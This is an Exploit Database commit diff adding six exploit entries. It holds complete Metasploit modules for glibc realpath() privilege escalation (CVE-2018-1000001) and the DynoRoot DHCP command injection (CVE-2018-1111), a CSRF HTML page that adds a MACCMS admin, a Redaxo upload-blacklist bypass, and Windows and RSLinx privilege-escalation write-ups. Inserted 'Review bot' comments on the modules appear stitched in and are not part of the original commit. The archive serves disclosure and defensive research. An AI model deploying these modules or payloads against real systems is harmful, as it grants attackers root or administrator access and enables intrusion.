DB: 2018-06-14

6 changes to exploits/shellcodes

Microsoft Windows 10 - Child Process Restriction Mitigation Bypass
glibc - 'realpath()' Privilege Escalation (Metasploit)
RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation

DHCP Client - Command Injection (DynoRoot) (Metasploit)
MACCMS 10 - Cross-Site Request Forgery (Add User)
Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload
Offensive Security 2018-06-14 05:01:45 +00:00
parent 6d3190ddfa
commit de3b5004b9
7 changed files with 425 additions and 0 deletions

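--- a/exploits/linux/local/44889.rb
+++ b/exploits/linux/local/44889.rb
@@ -0,0 +1,200 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Local
+Rank = NormalRanking
+include Msf::Post::File
+include Msf::Post::Linux::Priv
+include Msf::Post::Linux::System
+include Msf::Post::Linux::Kernel
+include Msf::Exploit::EXE
+include Msf::Exploit::FileDropper
+def initialize(info = {})
+super(update_info(info,
+'Name' => "glibc 'realpath()' Privilege Escalation",
+'Description' => %q{
+This module attempts to gain root privileges on Linux systems by abusing
+a vulnerability in GNU C Library (glibc) version 2.26 and prior.
+This module uses halfdog's RationalLove exploit to exploit a buffer
+underflow in glibc realpath() and create a SUID root shell. The exploit
+has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1.
+The target system must have unprivileged user namespaces enabled.
+This module has been tested successfully on Ubuntu Linux 16.04.3 (x86_64)
+with glibc version 2.23-0ubuntu9; and Debian 9.0 (x86_64) with glibc
+version 2.24-11+deb9u1.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'halfdog', # Discovery and RationalLove.c exploit
+'Brendan Coles' # Metasploit
+],
+'DisclosureDate' => 'Jan 16 2018',
+'Platform' => [ 'linux' ],
+'Arch' => [ ARCH_X86, ARCH_X64 ],
+'SessionTypes' => [ 'shell', 'meterpreter' ],
+'Targets' => [[ 'Auto', {} ]],
+'Privileged' => true,
+'References' =>
+[
+[ 'AKA', 'RationalLove.c' ],
+[ 'BID', '102525' ],
+[ 'CVE', '2018-1000001' ],
+[ 'EDB', '43775' ],
+[ 'URL', 'https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/' ],
+[ 'URL', 'http://www.openwall.com/lists/oss-security/2018/01/11/5' ],
+[ 'URL', 'https://securitytracker.com/id/1040162' ],
+[ 'URL', 'https://sourceware.org/bugzilla/show_bug.cgi?id=22679' ],
+[ 'URL', 'https://usn.ubuntu.com/3534-1/' ],
+[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1533836' ]
+],
+'DefaultTarget' => 0))
+register_options [
+OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
+OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+]
+end
+def base_dir
+datastore['WritableDir'].to_s
+end
+def upload(path, data)
+print_status "Writing '#{path}' (#{data.size} bytes) ..."
+write_file path, data
+register_file_for_cleanup path
+end
+def upload_and_chmodx(path, data)
+upload path, data
+cmd_exec "chmod +x '#{path}'"
+end
+def upload_and_compile(path, data)
+upload "#{path}.c", data
+gcc_cmd = "gcc -w -o #{path} #{path}.c"
+if session.type.eql? 'shell'
+gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
+end
+output = cmd_exec gcc_cmd
+unless output.blank?
+print_error output
+fail_with Failure::Unknown, "#{path}.c failed to compile"
+end
+register_file_for_cleanup path
+cmd_exec "chmod +x #{path}"
+end
+def exploit_data(file)
+path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2018-1000001', file
+fd = ::File.open path, 'rb'
+data = fd.read fd.stat.size
+fd.close
+data
+end
+def live_compile?
+return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
+if has_gcc?
+vprint_good 'gcc is installed'
+return true
+end
+unless datastore['COMPILE'].eql? 'Auto'
+fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
+end
+end
+def check
+version = kernel_release
+if Gem::Version.new(version.split('-').first) < Gem::Version.new('2.6.36')
+vprint_error "Linux kernel version #{version} is not vulnerable"
+return CheckCode::Safe
+end
+vprint_good "Linux kernel version #{version} is vulnerable"
+arch = kernel_hardware
+unless arch.include? 'x86_64'
+vprint_error "System architecture #{arch} is not supported"
+return CheckCode::Safe
+end
+vprint_good "System architecture #{arch} is supported"
+unless userns_enabled?
+vprint_error 'Unprivileged user namespaces are not permitted'
+return CheckCode::Safe
+end
+vprint_good 'Unprivileged user namespaces are permitted'
+version = glibc_version
+if Gem::Version.new(version.split('-').first) > Gem::Version.new('2.26')
+vprint_error "GNU C Library version #{version} is not vulnerable"
+return CheckCode::Safe
+end
+vprint_good "GNU C Library version #{version} is vulnerable"
+# fuzzy match glibc 2.23-0ubuntu9 and 2.24-11+deb9u1
+glibc_banner = cmd_exec('ldd --version')
+unless glibc_banner.include?('2.23-0ubuntu') || glibc_banner.include?('2.24-11+deb9')
+vprint_error 'No offsets for this version of GNU C Library'
+return CheckCode::Safe
+end
+CheckCode::Appears
+end
+def exploit
+if is_root?
+fail_with Failure::BadConfig, 'Session already has root privileges'
+end
+if check != CheckCode::Appears
+fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+end
+unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
+fail_with Failure::BadConfig, "#{base_dir} is not writable"
+end
+# Upload exploit executable
+executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
+@executable_path = "#{base_dir}/#{executable_name}"
+if live_compile?
+vprint_status 'Live compiling exploit on system...'
+upload_and_compile @executable_path, exploit_data('RationalLove.c')
+else
+vprint_status 'Dropping pre-compiled exploit on system...'
+upload_and_chmodx @executable_path, exploit_data('RationalLove')
+end
+# Upload payload executable
+payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
+upload_and_chmodx payload_path, generate_payload_exe
+# Launch exploit
+print_status 'Launching exploit...'
+output = cmd_exec "echo '#{payload_path} & exit' | #{@executable_path}", nil, 30
+output.each_line { |line| vprint_status line.chomp }
+end
+def on_new_session(client)
+# remove root owned SUID executable
+if client.type.eql? 'meterpreter'
+client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'
+client.fs.file.rm @executable_path
+else
+client.shell_command_token "rm #{@executable_path}"
+end
+end
+end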
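Review bot: `exploit_data` closes the handle opened by `fd = ::File.open path, 'rb'` by hand with no `ensure`, so an exception raised by `fd.read` leaks the descriptor; the body can collapse to a single `::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-1000001', file)`, which also drops the manual `stat.size` bookkeeping. In `check`, the values returned by `kernel_release` and `glibc_version` go straight into `version.split('-').first` and `Gem::Version.new`, so a `nil` or malformed string (presumably what comes back when the underlying command fails on the session — not verifiable from this file) raises `NoMethodError`/`ArgumentError` and aborts the check instead of returning `CheckCode::Unknown`; a `rescue ArgumentError, NoMethodError` around each comparison that prints the raw string and returns `CheckCode::Unknown` would fail safe. The two `chmod +x` calls also disagree on quoting (`'#{path}'` in `upload_and_chmodx`, bare `#{path}` in `upload_and_compile` and in the `gcc` command line), so a `WritableDir` containing spaces breaks only the compile path; quoting consistently removes that inconsistency.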

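--- a/exploits/linux/remote/44890.rb
+++ b/exploits/linux/remote/44890.rb
@@ -0,0 +1,67 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::DHCPServer
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'DHCP Client Command Injection (DynoRoot)',
+'Description' => %q{
+This module exploits the DynoRoot vulnerability, a flaw in how the
+NetworkManager integration script included in the DHCP client in
+Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier
+processes DHCP options. A malicious DHCP server, or an attacker on
+the local network able to spoof DHCP responses, could use this flaw
+to execute arbitrary commands with root privileges on systems using
+NetworkManager and configured to obtain network configuration using
+the DHCP protocol.
+},
+'Author' =>
+[
+'Felix Wilhelm', # Vulnerability discovery
+'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>' # Metasploit module
+],
+'License' => MSF_LICENSE,
+'Platform' => ['unix'],
+'Arch' => ARCH_CMD,
+'Privileged' => true,
+'References' =>
+[
+['AKA', 'DynoRoot'],
+['CVE', '2018-1111'],
+['EDB': '44652'],
+['URL', 'https://github.com/kkirsche/CVE-2018-1111'],
+['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'],
+['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'],
+['URL', 'https://dynoroot.ninja/'],
+['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'],
+['URL', 'https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble'],
+['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
+],
+'Targets' => [ [ 'Automatic Target', { }] ],
+'DefaultTarget' => 0,
+'DisclosureDate' => 'May 15 2018'
+))
+deregister_options('DOMAINNAME', 'HOSTNAME', 'URL', 'FILENAME')
+end
+def exploit
+hash = datastore.copy
+start_service(hash)
+@dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(6..12)}'&#{payload.encoded} #")
+begin
+while @dhcp.thread.alive?
+sleep 2
+end
+ensure
+stop_service
+end
+end
+end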
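Review bot: The EDB reference entry `['EDB': '44652']` uses a colon where every other entry in the `'References'` list uses a comma, so Ruby parses it as a one-element array holding the hash `{EDB: '44652'}` rather than the `[type, id]` pair the surrounding entries supply; it should read `['EDB', '44652']`. The code still loads because the literal is syntactically valid, which is why this slipped through, but the reference cannot resolve to an EDB identifier in that shape and presumably surfaces as a malformed-reference warning when the framework processes the module's info (the reference parser is outside this file). Fixing the one line restores consistency with the CVE and URL entries above and below it.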


@ -0,0 +1,28 @@
# Exploit Title: MACCMS_V10 CSRF vulnerability add admin account
# Date: 2018-06-11
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9168309.html
# Software Link: http://www.maccms.com/down.html
# Version: V10
# CVE : CVE-2018-12114
I found a CSRF vulnerability in maccms_v10,this vulnerability can be arbitrarily added to users.
The payload for attack is as follows.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://10.211.55.17/maccms10/admin.php/admin/admin/info.html" method="POST">
<input type="hidden" name="admin_id" value="" />
<input type="hidden" name="admin_name" value="test2" />
<input type="hidden" name="admin_pwd" value="test2" />
<input type="hidden" name="admin_status" value="1" />
<input type="hidden" name="admin_auth[0]" value="index/welcome" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


@ -0,0 +1,22 @@
# Exploit Title: Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload
# Date: 2018-06-13
# Exploit Author: mn@HackerWerkstatt
# Vendor Homepage: https://redaxo.org
# Software Link: https://redaxo.org/download/redaxo/5.5.1.zip
# Version: 5.5.1 and older
# Tested on: LinuxMint
# More: Login required
### PoC ###
In the REDAXO CMS under version 5.6.0 the mediapool addon is vuln. Users who have an user-account, like editor,
can use the mediapool to upload files. The mediapool addon under version 2.4.0 uses a blacklist for fileupload.
For users it isn't possible upload files named: php, php4, php5, php6 or php7.
But, if you name the files like php71 or php53 the blacklist-function ignore this and upload of shellcode-file is possible.
https://example.com/redaxo/index.php?page=mediapool/media
### Fixed in mediapool 2.4.0 and Redaxo CMS 5.6.0
### reported: 08.03.2018
### fixed: 08.06.2018


@ -0,0 +1,58 @@
Windows: Child Process Restriction Mitigation Bypass
Platform: Windows 10 1709 (not tested other versions)
Class: Security Feature Bypass
Summary:
Its possible to bypass the child process restriction mitigation policy by impersonating the anonymous token leading to a security feature bypass.
Description:
Windows 10 has a mitigation policy to restrict a process creating new child processes. I believe the main rationale is to prevent escaping some of the other mitigations which are not inherited across to new child processes as well as bugs which can only be exploiting from a fresh process. The policy is enforced as a flag in the token rather than on the process which allows the restriction to be passed across process boundaries during impersonation, which would also kill abusing WMI Win32_Process and similar.
During process creation the token flag is checked in SeSubProcessToken which creates the new primary token for the new process. Its possible to also specify a flag for overriding the behavior, the code looks something like the following:
if (ChildProcessOptions & PROCESS_CREATION_CHILD_PROCESS_OVERRIDE)
{
PTOKEN CurrentToken = PsReferenceEffectiveToken(
KeGetCurrentThread(),
&Type,
&CopyOnOpen,
&ImpersonationLevel);
if ( Type == TokenImpersonation && ImpersonationLevel < SecurityImpersonation
|| (SeTokenIsNoChildProcessRestrictionEnforced(CurrentToken) != 0 && Type != TokenPrimary))
{
return STATUS_CHILD_PROCESS_BLOCKED;
}
}
This checks if the PROCESS_CREATION_CHILD_PROCESS_OVERRIDE is set then either the primary or impersonation token do not have the restrict child process flag set. If the token does have the flag then STATUS_CHILD_PROCESS_BLOCKED is returned and process creation fails. The problem with this code is it entirely relies on a process not being able to get an impersonation token without the flag. For a normal user process this would be trivial (of course its trivial to bypass this restriction from a normal process anyway) but from an AppContainer it should be much more difficult.
There is an easy token we can impersonate which doesnt have the flag set, the Anonymous token. The problem with this is if we impersonate over the entire process creation then it will fail because the kernel will not be able to open the target executable. Fortunately the check for child process creation is after opening the file so we can abuse oplocks and from a separate thread assign the impersonation token while the thread is still running kernel code. So the following steps can be used to create an arbitrary child process:
1. Place an oplock on the image file for the process we want to create and wait for completion.
2. In a separate thread create a new process with the desired image file.
3. Once oplock has completed impersonate the anonymous token on the thread calling create process. Release oplock.
4. Original thread should continue process creation and check the anonymous token for the restricted flag bypassing the mitigation.
Note that you could probably also abuse the conhost creation inside ConDrv as that runs with kernel permissions so wont actually care about the anonymous token but it would be nicer to demonstrate this bypass with an arbitrary process.
From a fixing perspective Im not entirely clear what the purpose of checking the impersonation token is. Im guessing its supposed to allow a secondary process without restriction to use a process which has the restriction as a parent process using a process attribute. In that case perhaps you need a check that the parent process attribute is set and were not being called from the same process or something similar so that only that use case can pass the override flag.
Proof of Concept:
Ive provided a PoC as a C# project. It will first respawn itself into an AppContainer with the child process restriction mitigation enabled. The use of a AppContainer shows that this would be normally much more difficult to circumvent as you cant just open other processes. It will then use the outlined attack to bypass the restriction and respawn itself a second time. If successful there should be three copies of the poc running, two with child process creation restrictions inside an AppContainer.
1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work.
2) Apply the ALL_APPLICATIONS_PACKAGES Read/Execute ACE to the POCs directory otherwise respawning as an AC will not work.
2) Execute the PoC
Expected Result:
The second process should fail to create a new process.
Observed Result:
The second process creates a new process and the third process in the chain shows a Hello message box.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44888.zip


@ -0,0 +1,44 @@
# Title: RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation
# Date: 2017-12-11
# Author: LiquidWorm
# Vendor: Rockwell Automation, Inc.
# Product web page: https://www.rockwellautomation.com
# Affected version: Rockwell Automation RSLinx Classic 3.90.01
# Rockwell Automation RSLinx Classic 3.73.00
# Rockwell Automation RSLinx Classic 3.72.00
# Rockwell Automation RSLinx Classic 2.58.00
# Rockwell Automation FactoryTalk Linx Gateway 3.90.00
# CVE: CVE-2018-10619
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
# Summary:
# The FactoryTalk Linx Gateway adds a Classic OPC DA and OPC UA server
# interface to deliver information collected by FactoryTalk Linx from Logix5000™
# and other Allen-Bradley® controllers to external OPC clients, permitting
# third-party software to coexist with FactoryTalk® software.
# PoC:
The application suffers from an unquoted search path issue impacting
the service 'dnwhodisp' for Windows deployed as part of RSLinx and FactoryTalk.
This could potentially allow an authorized but non-privileged local user to
execute arbitrary code with elevated privileges on the system.
A successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot. If
successful, the local user's code would execute with the elevated privileges
of the application.
C:\>sc qc dnwhodisp
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: dnwhodisp
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Rockwell Software\RSLINX\dnwhodisp.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : dnWhoDisp
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem


@ -9777,6 +9777,9 @@ id,file,description,date,author,type,platform,port
41705,exploits/windows_x86/local/41705.cpp,"Fortinet FortiClient 5.2.3 (Windows 10 x86) - Local Privilege Escalation",2017-03-11,sickness,local,windows_x86, 41705,exploits/windows_x86/local/41705.cpp,"Fortinet FortiClient 5.2.3 (Windows 10 x86) - Local Privilege Escalation",2017-03-11,sickness,local,windows_x86,
44852,exploits/android/local/44852.txt,"Ftp Server 1.32 - Credential Disclosure",2018-06-07,ManhNho,local,android, 44852,exploits/android/local/44852.txt,"Ftp Server 1.32 - Credential Disclosure",2018-06-07,ManhNho,local,android,
44858,exploits/windows/local/44858.txt,"TrendMicro OfficeScan XG 11.0 - Change Prevention Bypass",2018-06-08,hyp3rlinx,local,windows, 44858,exploits/windows/local/44858.txt,"TrendMicro OfficeScan XG 11.0 - Change Prevention Bypass",2018-06-08,hyp3rlinx,local,windows,
44888,exploits/windows/local/44888.txt,"Microsoft Windows 10 - Child Process Restriction Mitigation Bypass",2018-06-13,"Google Security Research",local,windows,
44889,exploits/linux/local/44889.rb,"glibc - 'realpath()' Privilege Escalation (Metasploit)",2018-06-13,Metasploit,local,linux,
44892,exploits/windows/local/44892.txt,"RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation",2018-06-13,LiquidWorm,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16564,6 +16567,7 @@ id,file,description,date,author,type,platform,port
44822,exploits/linux/remote/44822.txt,"Git < 2.17.1 - Remote Code Execution",2018-06-01,JameelNabbo,remote,linux, 44822,exploits/linux/remote/44822.txt,"Git < 2.17.1 - Remote Code Execution",2018-06-01,JameelNabbo,remote,linux,
44829,exploits/linux/remote/44829.py,"CyberArk < 10 - Memory Disclosure",2018-06-04,"Thomas Zuk",remote,linux, 44829,exploits/linux/remote/44829.py,"CyberArk < 10 - Memory Disclosure",2018-06-04,"Thomas Zuk",remote,linux,
44836,exploits/ios/remote/44836.rb,"WebKit - not_number defineProperties UAF (Metasploit)",2018-06-05,Metasploit,remote,ios, 44836,exploits/ios/remote/44836.rb,"WebKit - not_number defineProperties UAF (Metasploit)",2018-06-05,Metasploit,remote,ios,
44890,exploits/linux/remote/44890.rb,"DHCP Client - Command Injection (DynoRoot) (Metasploit)",2018-06-13,Metasploit,remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39546,3 +39550,5 @@ id,file,description,date,author,type,platform,port
44884,exploits/php/webapps/44884.txt,"WordPress Ultimate Form Builder Lite Plugin < 1.3.7 - SQL Injection",2018-06-12,defensecode,webapps,php, 44884,exploits/php/webapps/44884.txt,"WordPress Ultimate Form Builder Lite Plugin < 1.3.7 - SQL Injection",2018-06-12,defensecode,webapps,php,
44885,exploits/hardware/webapps/44885.txt,"Canon LBP7110Cw - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware, 44885,exploits/hardware/webapps/44885.txt,"Canon LBP7110Cw - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware,
44886,exploits/hardware/webapps/44886.txt,"Canon LBP6030w - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware, 44886,exploits/hardware/webapps/44886.txt,"Canon LBP6030w - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware,
44887,exploits/php/webapps/44887.html,"MACCMS 10 - Cross-Site Request Forgery (Add User)",2018-06-13,bay0net,webapps,php,
44891,exploits/php/webapps/44891.txt,"Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload",2018-06-13,h0n1gsp3cht,webapps,php,
